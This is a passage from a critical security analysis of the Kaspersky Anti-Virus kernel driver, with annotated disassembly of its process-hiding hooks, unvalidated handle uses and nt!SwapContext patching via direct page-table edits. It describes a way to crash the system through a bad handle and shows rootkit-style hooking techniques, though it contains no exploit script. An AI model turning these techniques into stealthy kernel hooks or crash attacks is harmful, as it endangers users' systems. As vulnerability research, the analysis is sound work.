+.text:F8224443 push edi +.text:F8224444 push eax +.text:F8224445 push ecx +.text:F8224446 push edx +.text:F8224447 push esi +.text:F8224448 call OrigNtQuerySystemInformation +.text:F822444E mov edi, eax +.text:F8224450 cmp esi, SystemProcessesAndThreadsInformation ; +.text:F8224450 ; Not the process / thread list API? +.text:F8224450 ; Return to caller +.text:F8224453 mov [esp+10h+ReturnLength], edi +.text:F8224457 jnz ret_KavNtQuerySystemInformation +.text:F822445D xor ebx, ebx +.text:F822445F cmp edi, ebx ; +.text:F822445F ; Nothing returned? +.text:F822445F ; Return to caller +.text:F8224461 jl ret_KavNtQuerySystemInformation +.text:F8224467 push ebx +.text:F8224468 push 9 +.text:F822446A push 8 +.text:F822446C call sub_F8216730 +.text:F8224471 test al, al +.text:F8224473 jz ret_KavNtQuerySystemInformation +.text:F8224479 mov ebp, g_KavDriverData +.text:F822447F mov ecx, [ebp+0Ch] +.text:F8224482 lea edx, [ebp+48h] +.text:F8224485 inc ecx +.text:F8224486 mov [ebp+0Ch], ecx +.text:F8224489 mov ecx, ebp +.text:F822448B call ds:ExInterlockedPopEntrySList +.text:F8224491 mov esi, eax +.text:F8224493 cmp esi, ebx +.text:F8224495 jnz short loc_F82244B7 +.text:F8224497 mov eax, [ebp+10h] +.text:F822449A mov ecx, [ebp+24h] +.text:F822449D mov edx, [ebp+1Ch] +.text:F82244A0 inc eax +.text:F82244A1 mov [ebp+10h], eax +.text:F82244A4 mov eax, [ebp+20h] +.text:F82244A7 push eax +.text:F82244A8 push ecx +.text:F82244A9 push edx +.text:F82244AA call [ebp+arg_24] +.text:F82244AD mov esi, eax +.text:F82244AF cmp esi, ebx +.text:F82244B1 jz ret_KavNtQuerySystemInformation +.text:F82244B7 +.text:F82244B7 loc_F82244B7: ; CODE XREF: KavNtQuerySystemInformation+65j +.text:F82244B7 mov edi, [esp+10h+SystemInformation] +.text:F82244BB mov dword ptr [esi], 8 +.text:F82244C1 mov dword ptr [esi+4], 9 +.text:F82244C8 mov [esi+8], ebx +.text:F82244CB mov [esi+34h], ebx +.text:F82244CE mov dword ptr [esi+3Ch], 1 +.text:F82244D5 mov [esi+10h], bl +.text:F82244D8 mov [esi+30h], ebx +.text:F82244DB mov [esi+0Ch], ebx +.text:F82244DE mov [esi+38h], ebx +.text:F82244E1 mov ebp, 13h +.text:F82244E6 +.text:F82244E6 LoopThreadProcesses: ; CODE XREF: KavNtQuerySystemInformation+ECj +.text:F82244E6 mov dword ptr [esi+40h], 4 ; +.text:F82244E6 ; Loop through the returned list of processes and threads. +.text:F82244E6 ; For each process, we shall check to see if it is a +.text:F82244E6 ; special (protected) process. If so, then we might +.text:F82244E6 ; decide to remove its threads from the listing returned +.text:F82244E6 ; by setting the thread count to zero. +.text:F82244ED mov [esi+48h], ebx +.text:F82244F0 mov [esi+44h], ebp +.text:F82244F3 mov eax, [edi+SYSTEM_PROCESSES.ProcessId] +.text:F82244F6 push ebx +.text:F82244F7 push esi +.text:F82244F8 mov [esi+4Ch], eax +.text:F82244FB call KavCheckProcess +.text:F8224500 cmp eax, 7 +.text:F8224503 jz short CheckNextThreadProcess +.text:F8224505 cmp eax, 1 +.text:F8224508 jz short CheckNextThreadProcess +.text:F822450A cmp eax, ebx +.text:F822450C jz short CheckNextThreadProcess +.text:F822450E mov [edi+SYSTEM_PROCESSES.ThreadCount], ebx ; Zero thread count out (hide process threads) +.text:F8224511 +.text:F8224511 CheckNextThreadProcess: ; CODE XREF: KavNtQuerySystemInformation+D3j +.text:F8224511 ; KavNtQuerySystemInformation+D8j ... +.text:F8224511 mov eax, [edi+SYSTEM_PROCESSES.NextEntryDelta] +.text:F8224513 cmp eax, ebx +.text:F8224515 setz cl +.text:F8224518 add edi, eax +.text:F822451A cmp cl, bl +.text:F822451C jz short LoopThreadProcesses + + +2.4. Improper validation of kernel object types. + +Windows exposes many kernel features through a series of "kernel objects", +which may be acted upon by user mode through the user of handles. Handles are +integral values that are translated by the kernel into pointers to a particular +object upon which something (typically a system service) interacts with on +behalf of a caller. All objects share the same handle namespace. + +Because of this handle namespace sharing between objects of different types, +one of the jobs of a system service inspecting a handle is to verify that the +object that it refers to is of the expected type. This is accomplished by an +object manager routine ObReferenceObjectByHandle, which performs the +translation of handles to object pointers and does an optional built-in type +check by comparing a type field in the standard object header to a passed in +type. + +Since KAV hooks system services, in inevitably must deal with kernel handles. +Unfortunately, it does not do so correctly. In some cases, it does not ensure +that a handle refers to an object of a particular type before using the object +pointer, which will result in corruption or a system crash if a handle of the +wrong type is passed to a system service. + +One such case is the KAV NtResumeThread hook, which attempts to track the state +of running threads in the system. In this particular case, it does not seem +possible for user mode to crash the system by passing an object of the wrong +type as the returned object pointer, because it is simply used as a key in a +lookup table that is prepopulated with thread object pointers. KAV also hooks +NtSuspendThread for similar purposes, and this hook has the same problem with +the validation of object handle types. + + +.text:F82245E0 ; NTSTATUS __stdcall KavNtResumeThread(HANDLE ThreadHandle,PULONG PreviousSuspendCount) +.text:F82245E0 KavNtResumeThread proc near ; DATA XREF: sub_F82249D0+FBo +.text:F82245E0 +.text:F82245E0 ThreadHandle = dword ptr 8 +.text:F82245E0 PreviousSuspendCount= dword ptr 0Ch +.text:F82245E0 +.text:F82245E0 push esi +.text:F82245E1 mov esi, [esp+ThreadHandle] +.text:F82245E5 test esi, esi +.text:F82245E7 jz short loc_F8224620 +.text:F82245E9 lea eax, [esp+ThreadHandle] ; +.text:F82245E9 ; This should pass an object type here! +.text:F82245ED push 0 ; HandleInformation +.text:F82245EF push eax ; Object +.text:F82245F0 push 0 ; AccessMode +.text:F82245F2 push 0 ; ObjectType +.text:F82245F4 push 0F0000h ; DesiredAccess +.text:F82245F9 push esi ; Handle +.text:F82245FA mov [esp+18h+ThreadHandle], 0 +.text:F8224602 call ds:ObReferenceObjectByHandle +.text:F8224608 test eax, eax +.text:F822460A jl short loc_F8224620 +.text:F822460C mov ecx, [esp+ThreadHandle] +.text:F8224610 push ecx +.text:F8224611 call KavUpdateThreadRunningState +.text:F8224616 mov ecx, [esp+ThreadHandle] ; Object +.text:F822461A call ds:ObfDereferenceObject +.text:F8224620 +.text:F8224620 loc_F8224620: ; CODE XREF: KavNtResumeThread+7j +.text:F8224620 ; KavNtResumeThread+2Aj +.text:F8224620 mov edx, [esp+PreviousSuspendCount] +.text:F8224624 push edx +.text:F8224625 push esi +.text:F8224626 call OrigNtResumeThread +.text:F822462C pop esi +.text:F822462D retn 8 +.text:F822462D KavNtResumeThread endp +.text:F822462D + + +.text:F8224590 ; NTSTATUS __stdcall KavNtSuspendThread(HANDLE ThreadHandle,PULONG PreviousSuspendCount) +.text:F8224590 sub_F8224590 proc near ; DATA XREF: sub_F82249D0+113o +.text:F8224590 +.text:F8224590 ThreadHandle = dword ptr 8 +.text:F8224590 PreviousSuspendCount= dword ptr 0Ch +.text:F8224590 +.text:F8224590 push esi +.text:F8224591 mov esi, [esp+ThreadHandle] +.text:F8224595 test esi, esi +.text:F8224597 jz short loc_F82245D0 +.text:F8224599 lea eax, [esp+ThreadHandle] ; +.text:F8224599 ; This should pass an object type here! +.text:F822459D push 0 ; HandleInformation +.text:F822459F push eax ; Object +.text:F82245A0 push 0 ; AccessMode +.text:F82245A2 push 0 ; ObjectType +.text:F82245A4 push 0F0000h ; DesiredAccess +.text:F82245A9 push esi ; Handle +.text:F82245AA mov [esp+18h+ThreadHandle], 0 +.text:F82245B2 call ds:ObReferenceObjectByHandle +.text:F82245B8 test eax, eax +.text:F82245BA jl short loc_F82245D0 +.text:F82245BC mov ecx, [esp+ThreadHandle] +.text:F82245C0 push ecx +.text:F82245C1 call KavUpdateThreadSuspendedState +.text:F82245C6 mov ecx, [esp+ThreadHandle] ; Object +.text:F82245CA call ds:ObfDereferenceObject +.text:F82245D0 +.text:F82245D0 loc_F82245D0: ; CODE XREF: sub_F8224590+7j +.text:F82245D0 ; sub_F8224590+2Aj +.text:F82245D0 mov edx, [esp+PreviousSuspendCount] +.text:F82245D4 push edx +.text:F82245D5 push esi +.text:F82245D6 call OrigNtSuspendThread +.text:F82245DC pop esi +.text:F82245DD retn 8 +.text:F82245DD sub_F8224590 endp +.text:F82245DD + + +Not all of KAV's hooks are so fortunate, however. The NtTerminateProcess hook +that KAV installs looks into the body of the object referred to by the process +handle parameter of the function in order to determine the name of the process +being terminated. However, KAV fails to validate that the object handle given +by user mode really refers to a process object. + +This is unsafe for several reasons, which may be well known to the reader if +one is experienced with Windows kernel programming. + +1. The kernel process structure definition (EPROCESS) changes frequently from + OS release to OS release, and even between service packs. As a result, it + is not generally safe to access this structure directly. + +2. Because KAV does not perform proper type checking, it is possible to pass an + object handle to a different kernel object - say, a mutex - which may cause + KAV to bring down the system because the internal object structures of a + mutex (or any other kernel object) are not compatible with that of a process + object. + +KAV attempts to work around the first problem by attempting to discover the +offset of the member in the EPROCESS structure that contains the process name +at runtime. The algorithm used is to scan forward one byte at a time from the +start of the process object pointer until a sequence of bytes identifying the +name of the initial system process is discovered. (This routine is called in +the context of the initial system process). + + +.text:F82209E0 KavFindEprocessNameOffset proc near ; CODE XREF: sub_F8217A60+FCp +.text:F82209E0 push ebx +.text:F82209E1 push esi +.text:F82209E2 push edi +.text:F82209E3 call ds:IoGetCurrentProcess +.text:F82209E9 mov edi, ds:strncmp +.text:F82209EF mov ebx, eax +.text:F82209F1 xor esi, esi +.text:F82209F3 +.text:F82209F3 loc_F82209F3: ; CODE XREF: KavFindEprocessNameOffset+2Ej +.text:F82209F3 lea eax, [esi+ebx] +.text:F82209F6 push 6 ; size_t +.text:F82209F8 push eax ; char * +.text:F82209F9 push offset aSystem ; "System" +.text:F82209FE call edi ; strncmp +.text:F8220A00 add esp, 0Ch +.text:F8220A03 test eax, eax +.text:F8220A05 jz short loc_F8220A16 +.text:F8220A07 inc esi +.text:F8220A08 cmp esi, 3000h +.text:F8220A0E jl short loc_F82209F3 +.text:F8220A10 pop edi +.text:F8220A11 pop esi +.text:F8220A12 xor eax, eax +.text:F8220A14 pop ebx +.text:F8220A15 retn +.text:F8220A16 ; --------------------------------------------------------------------------- +.text:F8220A16 +.text:F8220A16 loc_F8220A16: ; CODE XREF: KavFindEprocessNameOffset+25j +.text:F8220A16 mov eax, esi +.text:F8220A18 pop edi +.text:F8220A19 pop esi +.text:F8220A1A pop ebx +.text:F8220A1B retn +.text:F8220A1B KavFindEprocessNameOffset endp + +.text:F8217B5C call KavFindEprocessNameOffset +.text:F8217B61 mov g_EprocessNameOffset, eax + + +Given a handle to an object of the wrong type, KAV will read from the returned +object body pointer in an attempt to determine the name of the process being +destroyed. This will typically run off the end of the structure for an object +that is not a process object (the Process object is very large compared to some +objects, such as a Mutex object, and the offset of the process name within this +structure is typically several hundred bytes or more). It is expected that +this will cause the system to crash if a bad handle is passed to +NtTerminateProcess. + + +.text:F82241C0 ; NTSTATUS __stdcall KavNtTerminateProcess(HANDLE ThreadHandle,NTSTATUS ExitStatus) +.text:F82241C0 KavNtTerminateProcess proc near ; DATA XREF: sub_F82249D0+ABo +.text:F82241C0 +.text:F82241C0 var_58 = dword ptr -58h +.text:F82241C0 ProcessObject = dword ptr -54h +.text:F82241C0 ProcessData = KAV_TERMINATE_PROCESS_DATA ptr -50h +.text:F82241C0 var_4 = dword ptr -4 +.text:F82241C0 ProcessHandle = dword ptr 4 +.text:F82241C0 ExitStatus = dword ptr 8 +.text:F82241C0 +.text:F82241C0 sub esp, 54h +.text:F82241C3 push ebx +.text:F82241C4 xor ebx, ebx +.text:F82241C6 push esi +.text:F82241C7 mov [esp+5Ch+ProcessObject], ebx +.text:F82241CB call KeGetCurrentIrql +.text:F82241D0 mov esi, [esp+5Ch+ProcessHandle] +.text:F82241D4 cmp al, 2 ; +.text:F82241D4 ; IRQL >= DISPATCH_LEVEL? Abort +.text:F82241D4 ; ( This is impossible for a system service ) +.text:F82241D6 jnb Ret_KavNtTerminateProcess +.text:F82241DC cmp esi, ebx ; +.text:F82241DC ; Null process handle? Abort +.text:F82241DE jz Ret_KavNtTerminateProcess +.text:F82241E4 call PsGetCurrentProcessId +.text:F82241E9 mov [esp+5Ch+ProcessData.CurrentProcessId], eax +.text:F82241ED xor eax, eax +.text:F82241EF cmp esi, 0FFFFFFFFh +.text:F82241F2 push esi ; ProcessHandle +.text:F82241F3 setnz al +.text:F82241F6 dec eax +.text:F82241F7 mov [esp+60h+ProcessData.TargetIsCurrentProcess], eax +.text:F82241FB call KavGetProcessIdFromProcessHandle +.text:F8224200 lea ecx, [esp+5Ch+ProcessObject] ; Object +.text:F8224204 push ebx ; HandleInformation +.text:F8224205 push ecx ; Object +.text:F8224206 push ebx ; AccessMode +.text:F8224207 push ebx ; ObjectType +.text:F8224208 push 0F0000h ; DesiredAccess +.text:F822420D push esi ; Handle +.text:F822420E mov [esp+74h+ProcessData.TargetProcessId], eax +.text:F8224212 mov [esp+74h+var_4], ebx +.text:F8224216 call ds:ObReferenceObjectByHandle +.text:F822421C test eax, eax +.text:F822421E jl short loc_F8224246 +.text:F8224220 mov edx, [esp+5Ch+ProcessObject] +.text:F8224224 mov eax, g_EprocessNameOffset +.text:F8224229 add eax, edx +.text:F822422B push 40h ; size_t +.text:F822422D lea ecx, [esp+60h+ProcessData.ProcessName] +.text:F8224231 push eax ; char * +.text:F8224232 push ecx ; char * +.text:F8224233 call ds:strncpy +.text:F8224239 mov ecx, [esp+68h+ProcessObject] +.text:F822423D add esp, 0Ch +.text:F8224240 call ds:ObfDereferenceObject +.text:F8224246 +.text:F8224246 loc_F8224246: ; CODE XREF: KavNtTerminateProcess+5Ej +.text:F8224246 cmp esi, 0FFFFFFFFh +.text:F8224249 jnz short loc_F8224255 +.text:F822424B mov edx, [esp+5Ch+ProcessData.TargetProcessId] +.text:F822424F push edx +.text:F8224250 call sub_F8226710 +.text:F8224255 +.text:F8224255 loc_F8224255: ; CODE XREF: KavNtTerminateProcess+89j +.text:F8224255 lea eax, [esp+5Ch+ProcessData] +.text:F8224259 push ebx ; int +.text:F822425A push eax ; ProcessData +.text:F822425B call KavCheckTerminateProcess +.text:F8224260 cmp eax, 7 +.text:F8224263 jz short loc_F822427D +.text:F8224265 cmp eax, 1 +.text:F8224268 jz short loc_F822427D +.text:F822426A cmp eax, ebx +.text:F822426C jz short loc_F822427D +.text:F822426E mov esi, STATUS_ACCESS_DENIED +.text:F8224273 mov eax, esi +.text:F8224275 pop esi +.text:F8224276 pop ebx +.text:F8224277 add esp, 54h +.text:F822427A retn 8 +.text:F822427D ; --------------------------------------------------------------------------- +.text:F822427D +.text:F822427D loc_F822427D: ; CODE XREF: KavNtTerminateProcess+A3j +.text:F822427D ; KavNtTerminateProcess+A8j ... +.text:F822427D mov eax, [esp+5Ch+ProcessData.TargetProcessId] +.text:F8224281 cmp eax, 1000h +.text:F8224286 jnb short loc_F8224296 +.text:F8224288 mov dword_F8228460[eax*8], ebx +.text:F822428F mov byte_F8228464[eax*8], bl +.text:F8224296 +.text:F8224296 loc_F8224296: ; CODE XREF: KavNtTerminateProcess+C6j +.text:F8224296 push eax +.text:F8224297 call sub_F82134D0 +.text:F822429C mov ecx, [esp+5Ch+ProcessData.TargetProcessId] +.text:F82242A0 push ecx +.text:F82242A1 call sub_F8221F70 +.text:F82242A6 mov edx, [esp+5Ch+ExitStatus] +.text:F82242AA push edx +.text:F82242AB push esi +.text:F82242AC call OrigNtTerminateProcess +.text:F82242B2 mov esi, eax +.text:F82242B4 lea eax, [esp+5Ch+ProcessData] +.text:F82242B8 push 1 ; int +.text:F82242BA push eax ; ProcessData +.text:F82242BB mov [esp+64h+var_4], esi +.text:F82242BF call KavCheckTerminateProcess +.text:F82242C4 mov eax, esi +.text:F82242C6 pop esi +.text:F82242C7 pop ebx +.text:F82242C8 add esp, 54h +.text:F82242CB retn 8 +.text:F82242CE ; --------------------------------------------------------------------------- +.text:F82242CE +.text:F82242CE Ret_KavNtTerminateProcess: ; CODE XREF: KavNtTerminateProcess+16j +.text:F82242CE ; KavNtTerminateProcess+1Ej +.text:F82242CE mov ecx, [esp+5Ch+ExitStatus] +.text:F82242D2 push ecx +.text:F82242D3 push esi +.text:F82242D4 call OrigNtTerminateProcess +.text:F82242DA pop esi +.text:F82242DB pop ebx +.text:F82242DC add esp, 54h +.text:F82242DF retn 8 +.text:F82242DF KavNtTerminateProcess endp + + +The whole purpose of this particular system service hook is "shady" as well. +The hook prevents certain KAV processes from being terminated, even by a +legitimate computer administrator - something that is once again typically +associated with malicious software such as rootkits rather than commercial +software applications. One possible explanation is to attempt to prevent +viruses from terminating the virus scanner processes itself, although one +wonders how much of a concern this would be if KAV's real-time scanning +mechanisms really do work as advertised. + +Additionally, KAV appears to do some state tracking just before the process is +terminated with this system service hook. The proper way to do this would have +been through PsSetCreateProcessNotifyRoutine, a documented kernel function that +allows drivers to register a callback that is called on process creation and +process exit. + + +2.5. Patching non-exported, non-system-service kernel functions. + +KAV's kernel patching is not limited to just system services, however. One of +the most dangerous hooks that KAV installs is one in the middle of the +nt!SwapContext function, which is neither exported nor a system service (and +thus has reliable mechanism to be detected by driver code, other than code +fingerprinting). nt!SwapContext is called by the kernel on every context +switch in order to perform some internal bookkeeping tasks. + +Patching such a critical, non-exported kernel function with a mechanism as +unreliable as blind code fingerprinting is, in the author's opinion, not a +particularly good idea. To make matters worse, KAV actually modifies code in +the middle of nt!SwapContext instead of patching the start of the function, and +as such makes assumptions about the internal register and stack usage of this +kernel function. + + + kd> u nt!SwapContext + nt!SwapContext: + 804db924 0ac9 or cl,cl + 804db926 26c6462d02 mov byte ptr es:[esi+0x2d],0x2 + 804db92b 9c pushfd + 804db92c 8b0b mov ecx,[ebx] + 804db92e e9dd69d677 jmp klif!KavSwapContext (f8242310) + + +The unmodified nt!SwapContext has code that runs along the lines of this: + + + lkd> u nt!SwapContext + nt!SwapContext: + 80540ab0 0ac9 or cl,cl + 80540ab2 26c6462d02 mov byte ptr es:[esi+0x2d],0x2 + 80540ab7 9c pushfd + 80540ab8 8b0b mov ecx,[ebx] + 80540aba 83bb9409000000 cmp dword ptr [ebx+0x994],0x0 + 80540ac1 51 push ecx + 80540ac2 0f8535010000 jne nt!SwapContext+0x14d (80540bfd) + 80540ac8 833d0ca0558000 cmp dword ptr [nt!PPerfGlobalGroupMask (8055a00c)],0x0 + + +This is an extremely dangerous patching operation to make, for several reasons: + +1. nt!SwapContext is a *very* hot code path, as it is called on every single + context switch. Therefore, patching it at runtime without running a non-trivial + risk of bringing down the system is very difficult, especially on + multiprocessor systems. KAV attempts to solve the synchronization problems + relating to patching this function on uniprocessor systems by disabling + interrupts entirely, but this approach will not work reliably on + multiprocessor systems. KAV makes no attempt to address this problem on + multiprocessor systems and puts them at the risk of randomly failing on boot + during KAV's patching. + +2. Reliably locating this function and making assumptions about the register + and stack usage (and instruction layout) across all released and future + Windows versions is a practical impossibility, and yet KAV attempts to do + just this. This puts KAV customers at the mercy of the next Windows update, + which may cause their systems to crash on boot because KAV's hooking code + makes an assumption that has been invalidated about the context-switching + process. + + +Additionally, in order to perform code patching on the kernel, KAV adjusts the +page protections of kernel code to be writable by altering PTE attributes +directly instead of using documented functions (which would have proper locking +semantics for accessing internal memory management structures). + + +KAV nt!SwapContext patching: + + +.text:F82264EA mov eax, 90909090h ; Build the code to be written to nt!SwapContext +.text:F82264EF mov [ebp+var_38], eax +.text:F82264F2 mov [ebp+var_34], eax +.text:F82264F5 mov [ebp+var_30], ax +.text:F82264F9 mov byte ptr [ebp+var_38], 0E9h +.text:F82264FD mov ecx, offset KavSwapContext +.text:F8226502 sub ecx, ebx +.text:F8226504 sub ecx, 5 +.text:F8226507 mov [ebp+var_38+1], ecx +.text:F822650A mov ecx, [ebp+var_1C] +.text:F822650D lea edx, [ecx+ebx] +.text:F8226510 mov dword_F8228338, edx +.text:F8226516 mov esi, ebx +.text:F8226518 mov edi, offset unk_F8227DBC +.text:F822651D mov eax, ecx +.text:F822651F shr ecx, 2 +.text:F8226522 rep movsd +.text:F8226524 mov ecx, eax +.text:F8226526 and ecx, 3 +.text:F8226529 rep movsb +.text:F822652B lea ecx, [ebp+var_48] ; Make nt!SwapContext writable by directly accessing +.text:F822652B ; the PTEs. +.text:F822652E push ecx +.text:F822652F push 1 +.text:F8226531 push ebx +.text:F8226532 call ModifyPteAttributes +.text:F8226537 test al, al +.text:F8226539 jz short loc_F8226588 +.text:F822653B mov ecx, offset KavInternalSpinLock +.text:F8226540 call KavSpinLockAcquire ; Disable interrupts +.text:F8226545 mov ecx, [ebp+var_1C] ; Write to kernel code +.text:F8226548 lea esi, [ebp+var_38] +.text:F822654B mov edi, ebx +.text:F822654D mov edx, ecx +.text:F822654F shr ecx, 2 +.text:F8226552 rep movsd +.text:F8226554 mov ecx, edx +.text:F8226556 and ecx, 3 +.text:F8226559 rep movsb +.text:F822655B mov edx, eax +.text:F822655D mov ecx, offset KavInternalSpinLock +.text:F8226562 call KavSpinLockRelease ; Reenable interrupts +.text:F8226567 lea eax, [ebp+var_48] ; Restore the original PTE attributes. +.text:F822656A push eax +.text:F822656B mov ecx, [ebp+var_48] +.text:F822656E push ecx +.text:F822656F push ebx +.text:F8226570 call ModifyPteAttributes +.text:F8226575 mov al, 1 +.text:F8226577 mov ecx, [ebp+var_10] +.text:F822657A mov large fs:0, ecx +.text:F8226581 pop edi +.text:F8226582 pop esi +.text:F8226583 pop ebx +.text:F8226584 mov esp, ebp +.text:F8226586 pop ebp +.text:F8226587 retn + + +KavSpinLockAcquire subroutine (disables interrupts): + + +.text:F8221240 KavSpinLockAcquire proc near ; CODE XREF: sub_F8225690+D7p +.text:F8221240 ; sub_F8225D50+8Cp ... +.text:F8221240 pushf +.text:F8221241 pop eax +.text:F8221242 +.text:F8221242 loc_F8221242: ; CODE XREF: KavSpinLockAcquire+13j +.text:F8221242 cli +.text:F8221243 lock bts dword ptr [ecx], 0 +.text:F8221248 jb short loc_F822124B +.text:F822124A retn +.text:F822124B ; --------------------------------------------------------------------------- +.text:F822124B +.text:F822124B loc_F822124B: ; CODE XREF: KavSpinLockAcquire+8j +.text:F822124B push eax +.text:F822124C popf +.text:F822124D +.text:F822124D loc_F822124D: ; CODE XREF: KavSpinLockAcquire+17j +.text:F822124D test dword ptr [ecx], 1 +.text:F8221253 jz short loc_F8221242 +.text:F8221255 pause +.text:F8221257 jmp short loc_F822124D +.text:F8221257 KavSpinLockAcquire endp + + +KavSpinLockRelease subroutine (reenables interrupts): + + +.text:F8221260 KavSpinLockRelease proc near ; CODE XREF: sub_F8225690+F2p +.text:F8221260 ; sub_F8225D50+BAp ... +.text:F8221260 mov dword ptr [ecx], 0 +.text:F8221266 push edx +.text:F8221267 popf +.text:F8221268 retn +.text:F8221268 KavSpinLockRelease endp + + + + +ModifyPteAttributes subroutine: + + +.text:F82203C0 ModifyPteAttributes proc near ; CODE XREF: sub_F821A9D0+91p +.text:F82203C0 ; sub_F8220950+43p ... +.text:F82203C0 +.text:F82203C0 var_24 = dword ptr -24h +.text:F82203C0 var_20 = byte ptr -20h +.text:F82203C0 var_1C = dword ptr -1Ch +.text:F82203C0 var_18 = dword ptr -18h +.text:F82203C0 var_10 = dword ptr -10h +.text:F82203C0 var_4 = dword ptr -4 +.text:F82203C0 arg_0 = dword ptr 8 +.text:F82203C0 arg_4 = byte ptr 0Ch +.text:F82203C0 arg_8 = dword ptr 10h +.text:F82203C0 +.text:F82203C0 push ebp +.text:F82203C1 mov ebp, esp +.text:F82203C3 push 0FFFFFFFFh +.text:F82203C5 push offset dword_F8212180 +.text:F82203CA push offset _except_handler3 +.text:F82203CF mov eax, large fs:0 +.text:F82203D5 push eax +.text:F82203D6 mov large fs:0, esp +.text:F82203DD sub esp, 14h +.text:F82203E0 push ebx +.text:F82203E1 push esi +.text:F82203E2 push edi +.text:F82203E3 mov [ebp+var_18], esp +.text:F82203E6 xor ebx, ebx +.text:F82203E8 mov [ebp+var_20], bl +.text:F82203EB mov esi, [ebp+arg_0] +.text:F82203EE mov ecx, esi +.text:F82203F0 call KavGetEflags +.text:F82203F5 push esi +.text:F82203F6 call KavGetPte ; This is a function pointer filled in at runtime, +.text:F82203F6 ; differing based on whether the system has PAE +.text:F82203F6 ; enabled or not. +.text:F82203FC mov edi, eax +.text:F82203FE mov [ebp+var_1C], edi +.text:F8220401 cmp edi, 0FFFFFFFFh +.text:F8220404 jz short loc_F8220458 +.text:F8220406 mov [ebp+var_4], ebx +.text:F8220409 mov ecx, esi +.text:F822040B call KavGetEflags +.text:F8220410 mov eax, [edi] +.text:F8220412 test al, 1 +.text:F8220414 jz short loc_F8220451 +.text:F8220416 mov ecx, eax +.text:F8220418 mov [ebp+var_24], ecx +.text:F822041B cmp [ebp+arg_4], bl +.text:F822041E jz short loc_F8220429 +.text:F8220420 mov eax, [ebp+var_1C] +.text:F8220423 lock or dword ptr [eax], 2 +.text:F8220427 jmp short loc_F8220430 +.text:F8220429 ; --------------------------------------------------------------------------- +.text:F8220429 +.text:F8220429 loc_F8220429: ; CODE XREF: ModifyPteAttributes+5Ej +.text:F8220429 mov eax, [ebp+var_1C] +.text:F822042C lock and dword ptr [eax], 0FFFFFFFDh +.text:F8220430 +.text:F8220430 loc_F8220430: ; CODE XREF: ModifyPteAttributes+67j +.text:F8220430 mov eax, [ebp+arg_8] +.text:F8220433 cmp eax, ebx +.text:F8220435 jz short loc_F822043C +.text:F8220437 and ecx, 2 +.text:F822043A mov [eax], cl +.text:F822043C +.text:F822043C loc_F822043C: ; CODE XREF: ModifyPteAttributes+75j +.text:F822043C mov [ebp+var_20], 1 +.text:F8220440 mov eax, [ebp+arg_0] +.text:F8220443 invlpg byte ptr [eax] +.text:F8220446 jmp short loc_F8220451 +.text:F8220448 ; --------------------------------------------------------------------------- +.text:F8220448 +.text:F8220448 loc_F8220448: ; DATA XREF: .text:F8212184o +.text:F8220448 mov eax, 1 +.text:F822044D retn +.text:F822044E ; --------------------------------------------------------------------------- +.text:F822044E +.text:F822044E loc_F822044E: ; DATA XREF: .text:F8212188o +.text:F822044E mov esp, [ebp-18h] +.text:F8220451 +.text:F8220451 loc_F8220451: ; CODE XREF: ModifyPteAttributes+54j +.text:F8220451 ; ModifyPteAttributes+86j +.text:F8220451 mov [ebp+var_4], 0FFFFFFFFh +.text:F8220458 +.text:F8220458 loc_F8220458: ; CODE XREF: ModifyPteAttributes+44j +.text:F8220458 mov al, [ebp+var_20] +.text:F822045B mov ecx, [ebp+var_10] +.text:F822045E mov large fs:0, ecx +.text:F8220465 pop edi +.text:F8220466 pop esi +.text:F8220467 pop ebx +.text:F8220468 mov esp, ebp +.text:F822046A pop ebp +.text:F822046B retn 0Ch +.text:F822046B ModifyPteAttributes endp + + +2.6. Allowing user mode code to access kernel memory directly from user mode, + improper validation of user mode structures. + +One of the most important principles of the kernel/user division that modern +operating systems enforce is that user mode is not allowed to directly access +kernel mode memory. This is necessary to enforce system stability, otherwise +a buggy user mode program could corrupt the kernel and bring down the whole +system. + +Unfortunately, the KAV programmers appear to think that this distinction is not +really so important after all. + +One of the strangest of the unsafe practicies implemented by KAV is to allow +user mode to directly call some portions of their kernel driver (within kernel +address space!) instead of just loading a user mode DLL (or otherwise loading +user mode code in the target process). + +This mechanism appears to be used to inspect DLLs as they are loaded - a task +which would be much better accomplished with PsSetLoadImageNotifyRoutine. + +KAV patches kernel32.dll as a new process is created, such that the export +table points all of the DLL-loading routines (e.g. LoadLibraryA) to a thunk +that calls portions of KAV's driver in kernel mode. Additionally, KAV modifes +protections on parts of its code and data sections to allow user mode read +access. + +KAV sets a PsLoadImageNotifyRoutine hook to detect kernel32.dll being loaded in +order to know when to patch kernel32's export table. The author wonders why +KAV did not just do their work from within PsSetLoadImageNotifyRoutine directly +instead of going through all the trouble to allow user mode to call kernel mode +for a LoadLibrary hook. + + +The CheckInjectCodeForNewProcess function is called when a new process loads an +image, and checks for kernel32 being loaded. If this is the case, it will +queue an APC to the process that will perform patching. + + +.text:F82218B0 ; int __stdcall CheckInjectCodeForNewProcess(wchar_t *,PUCHAR ImageBase) +.text:F82218B0 CheckInjectCodeForNewProcess proc near ; CODE XREF: KavLoadImageNotifyRoutine+B5p +.text:F82218B0 ; KavDoKernel32Check+41p +.text:F82218B0 +.text:F82218B0 arg_0 = dword ptr 4 +.text:F82218B0 ImageBase = dword ptr 8 +.text:F82218B0 +.text:F82218B0 mov al, byte_F82282F9 +.text:F82218B5 push esi +.text:F82218B6 test al, al +.text:F82218B8 push edi +.text:F82218B9 jz short loc_F8221936 +.text:F82218BB mov eax, [esp+8+arg_0] +.text:F82218BF push offset aKernel32_dll ; "kernel32.dll" +.text:F82218C4 push eax ; wchar_t * +.text:F82218C5 call ds:_wcsicmp +.text:F82218CB add esp, 8 +.text:F82218CE test eax, eax +.text:F82218D0 jnz short loc_F8221936 +.text:F82218D2 mov al, g_FoundKernel32Exports +.text:F82218D7 mov edi, [esp+8+ImageBase] +.text:F82218DB test al, al +.text:F82218DD jnz short KavInitializePatchApcLabel +.text:F82218DF push edi +.text:F82218E0 call KavCheckFindKernel32Exports +.text:F82218E5 test al, al +.text:F82218E7 jz short loc_F8221936 +.text:F82218E9 +.text:F82218E9 KavInitializePatchApcLabel: ; CODE XREF: CheckInjectCodeForNewProcess+2Dj +.text:F82218E9 push '3SeB' ; Tag +.text:F82218EE push 30h ; NumberOfBytes +.text:F82218F0 push 0 ; PoolType +.text:F82218F2 call ds:ExAllocatePoolWithTag +.text:F82218F8 mov esi, eax +.text:F82218FA test esi, esi +.text:F82218FC jz short loc_F8221936 +.text:F82218FE push edi +.text:F82218FF push 0 +.text:F8221901 push offset KavPatchNewProcessApcRoutine +.text:F8221906 push offset loc_F82218A0 +.text:F822190B push offset loc_F8221890 